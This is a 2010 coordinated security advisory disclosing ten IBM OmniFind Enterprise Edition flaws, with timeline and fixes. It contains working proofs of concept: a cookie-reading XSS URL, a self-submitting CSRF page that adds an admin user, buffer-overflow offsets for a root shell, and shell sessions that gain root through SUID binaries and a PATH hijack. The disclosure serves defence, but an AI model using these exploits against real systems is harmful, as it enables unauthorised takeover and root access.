IBM OmniFind Cross Site Scripting / Privilege Escalation

`============================================  
||| Security Advisory |||  
||| CVE-2010-3890 (CVE candidate) |||  
||| CVE-2010-3891 (CVE candidate) |||  
||| CVE-2010-3892 (CVE candidate) |||  
||| CVE-2010-3893 (CVE candidate) |||  
||| CVE-2010-3894 (CVE candidate) |||  
||| CVE-2010-3895 (CVE candidate) |||  
||| CVE-2010-3896 (CVE candidate) |||  
||| CVE-2010-3897 (CVE candidate) |||  
||| CVE-2010-3898 (CVE candidate) |||  
||| CVE-2010-3899 (CVE candidate) |||  
============================================  
  
IBM OmniFind several issues  
===========================  
  
Date released: 11/2010  
Date reported: 04/2009  
  
by Fatih Kilic  
Fraunhofer Institute for Secure Information Technology  
[email protected]  
http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3890  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3891  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3892  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3893  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3894  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3895  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3896  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3897  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3898  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3899  
  
Vendor: IBM  
Product: IBM OmniFind Enterprise Edition  
Website: http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/  
Vulnerabilities:  
- Cross-Site-Scripting (XSS)  
- Cross-Site-Request-Forgery (XSRF)  
- Session fixation  
- Session impersonation  
- Remote buffer overflow  
- Privilege escalation in two applications  
- Missing authentication in configuration panel  
- Admin password is delivered in plaintext inside the server response  
- Cookies are set for root path, not application path  
- Crawler endless loop  
  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Background:  
  
Quoting http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/:  
| IBM(R) OmniFind(tm) Enterprise Edition drives users to the information that matters   
through knowledge driven search.  
|  
| It’s designed to drive users to the knowledge they seek and enhance the visibility   
of content and context of your organization's unstructured information.  
|  
| * Dynamic - delivers complete dynamic facet capabilities, type-ahead search,   
real-time content alerting, is reactive to search-led content exploration  
| * Tailorable - delivers business adjustable relevancy and UIMA standardization   
for entity identification and tuned semantic searching  
| * Supportable - delivers search on 20+ platform, connects to 30+ repositories  
| * Secure - delivers enforced security across content repositories  
| * Scalable - lucene-based index for enterprise level scalability  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Overview:  
  
  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Technical details:  
  
* Cross-Site-Scripting (XSS) (CVE-2010-3890)  
  
The GET parameter »command« used inside the administration interface is  
embedded directly into the HTML source without any input validation or  
output sanitization. Using this parameter the attacker can inject arbitrary  
Javascript code which will be run in the session context of other users.  
As session credentials are stored within cookies, an attacker can steal  
the cookie information and impersonate (CVE-2010-3893) the session and  
control the web application within the browser context of the victim.  
  
  
Exploit to show cookies:  
http://omnifind-host/ESAdmin/collection.do?command=<script>alert(document.  
cookie);</script>  
  
  
* Cross-Site-Request-Forgery (XSRF) (CVE-2010-3891)  
  
The forms in the administrator interface are not protected against XSRF. The  
attacker can do any action in the context of the victim.  
  
An example attack scenario could be:  
The attacker creates a malicious website with a prepared form to add a new  
user, which will be submitted on load.  
  
  
Exploit to add an admin user:  
<html>  
<head><title>Some seemingly benign web-site</title></head>  
<body onLoad="document.forms[0].submit();">  
  
<form method="post"  
action="http://omnifind-host/ESAdmin/security.do">  
<input type="hidden" name="command" value="saveNewUser"/>  
<input type="hidden" name="user.name" value="joemueller"/>  
<input type="hidden" name="user.role" value="0"/>  
<input type="hidden" name="user.allCollections" value="true"/>  
<input type="hidden" name="apply" value="OK"/>  
</form>  
</body>  
</html>  
  
  
Solution: Fixed in release v9.1 of Omnifind.  
  
* Session fixation (CVE-2010-3892)  
  
The login form of the administrator interface is vulnerable to session fixation  
attacks. And attacker can use a prepared website or a XSS vulnerability (CVE-2010-3890)  
to change session ID (SID) of the login form. The SID have to be generated by the  
server. An attacker can visit the login interface and take the generated value and use  
this for the attack. After a valid authentication of the victim with the attacker SID,  
the attacker can do any action in the context of the administrator.  
  
  
* Session impersonation (CVE-2010-3893)  
  
The session ID (SID) is the only form of user authentication after the login and it  
is not bound to an IP address. By reading the cookies of the victim, e.g. using an  
XSS attack (CVE-2010-3890), the whole session can be hijacked and the attacker can  
do any action in the context of the administrator from any computer that can reach  
the administrator interface.  
  
  
* Remote buffer overflow (CVE-2010-3894)  
  
The administration interface has a login form with an username- and a passwordfield.  
Entering a valid username (default value is »esadmin«) and a very long string into  
the password field a buffer overflow is triggered.  
  
The function Java_com_ibm_es_oss_CryptionNative_ESEncrypt() defined in the file  
/opt/IBM/es/lib/libffq.cryptionjni.so is copying the password value to a fixed size  
buffer of 2048 bytes.  
  
  
There are two attack points to exploit this buffer overflow.  
  
The first attack is based on the following buffer combination  
  
password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes)  
  
The inserted value for »firstattackpoint« will be used in the registers EAX and EDI.  
These registers are used to write data into. This means you can insert any arbitrary  
address, where you want to write to.  
  
The second attack is overwriting the saved return address and has the following layout.  
  
password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes) + 480 bytes + EDX (4 bytes)  
+ EAX (4 bytes) + EIP (4 bytes)  
  
To reach the return to your overwritten instruction pointer, you have to insert a valid  
writeable address as firstattackpoint. This second attack has some restrictions, you  
can only use printable ASCII values. Non printable characters will be removed from the  
input string.  
This is no real barrier, since the code is big enough to have many jmp/call addresses,  
which have printable ASCII values in their addresses.  
  
During the overwrite the register ESI is pointing to your input, so you could use a  
call *%esi to jump to your ASCII filtered shellcode.  
  
  
During the first attackpoint your input is unfiltered, you can insert arbitrary values.  
If you combine both attacks together, you can exploit it remotely and get a (root) shell.  
  
Default running user is root :)  
  
  
  
* Privilege escalation in two applications (CVE-2010-3895)  
  
Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«.  
  
-------------------------------------------------------------------------  
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand  
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper  
-------------------------------------------------------------------------  
  
  
»esRunCommand« takes one argument and runs it as root. See example below.  
-------------------------------------------------------------------------  
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand  
  
joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id  
OUTPUT: cmd is id  
id  
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)  
-------------------------------------------------------------------------  
  
  
  
The application »estaskwrapper« is meant to start the application »estasklight«.  
The pseudo c code looks like this:  
-------------------------------------------------------------------------  
main() {  
int auth = 0;  
...  
if (argv[1] == "estasklight") {  
auth = 1;  
...  
path = getenv("ES_LIBRARY_PATH");  
if (path) {  
setenv("LD_LIBRARY_PATH", path);  
setenv("LIBPATH", path);  
...  
if (auth) {  
execvp ("estasklight", args);  
}  
...  
}  
...  
}  
...  
}  
-------------------------------------------------------------------------  
  
  
Explanation of the code:  
  
»argv[1]« is the first command line argument, that is compared with the string  
»estasklight«. If it is equal the »auth« flag is set.  
If the user has the environment variable »ES_LIBRARY_PATH« set, the value is  
copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«.  
If the »auth« flag is set, the application »estasklight« is executed.  
  
  
  
Exploit for running /bin/sh  
-------------------------------------------------------------------------  
joemueller@XXX:~> cp /bin/sh ~/bin/estasklight  
joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller  
joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH  
joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight  
XXX:~# id  
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)  
-------------------------------------------------------------------------  
  
  
  
* Missing authentication in configuration panel (CVE-2010-3896)  
  
All pages below the the path »http://omnifind-host/ESSearchApplication/« are reachable  
without any authentication. The server configurations page is located inside this  
directory at »http://omnifind-host/ESSearchApplication/palette.do«. An attacker can  
change the server configuration without authenticating himself against the application.  
  
  
* Admin password is delivered in plaintext inside the server response (CVE-2010-3897)  
  
The administrator password is embedded as value inside the HTML form at  
»http://omnifind-host/ESSearchApplication/palette.do« and is transmitted in plaintext  
over HTTP. An attacker with access to this page, for example obtained by another bug   
like  
»missing authentication« (CVE-2010-3896) or »session impersonation« (CVE-2010-3893),  
can use this password as a backdoor to the system.  
  
  
* Cookies are set for root path, not application path (CVE-2010-3898)  
  
The cookies are not restricted to the »ESAdmin« path, they are set for the domain  
root path. Every page inside the same domain, even from other directories, can access  
the administrator cookies and steal the session ID, which are used for authentication.  
  
* Crawler endless loop (CVE-2010-3899)  
  
The crawler has no recursion depth limit. A site with dynamic parameter manipulation can  
cause an endless loop. This loop will block the crawler thread and use permanent server  
resources. Too many blocks can lead to a denial of service. The same site will be  
indexed more times and the search results will display the same site many times. This  
can be abused for spamming the search results.  
  
  
Exploit to test the endless loop:  
/* loop.php */  
<?php  
$numb = rand();  
echo $numb.'<br><a href="loop.php?value='.$numb.'">click me</a>';  
?>  
  
  
  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Timeline:  
  
* 04/2009: Vulnerability reported to IBM  
* 05/2009: Response from IBM with a timeline of security updates  
* 07/2010: Coordinating public release of advisory  
* 11/2010: Public release of advisory  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Solution:  
  
A fix for the buffer overflow (CVE-2010-3894) was provided in Omnifind v8.5 Fixpack 6:  
https://www-304.ibm.com/jct01003c/support/docview.wss?rs=3278&context=SS5SQ7&uid=swg24027159&loc=en_US&cs=utf-8&lang=en  
  
Cross-Site-Scripting (CVE-2010-3890) and Privilege escalation in two applications   
(CVE-2010-3895)  
are fixed in release v9.1 of Omnifind.  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Credits:  
  
- Fatih Kilic, Fraunhofer SIT (discovery)  
`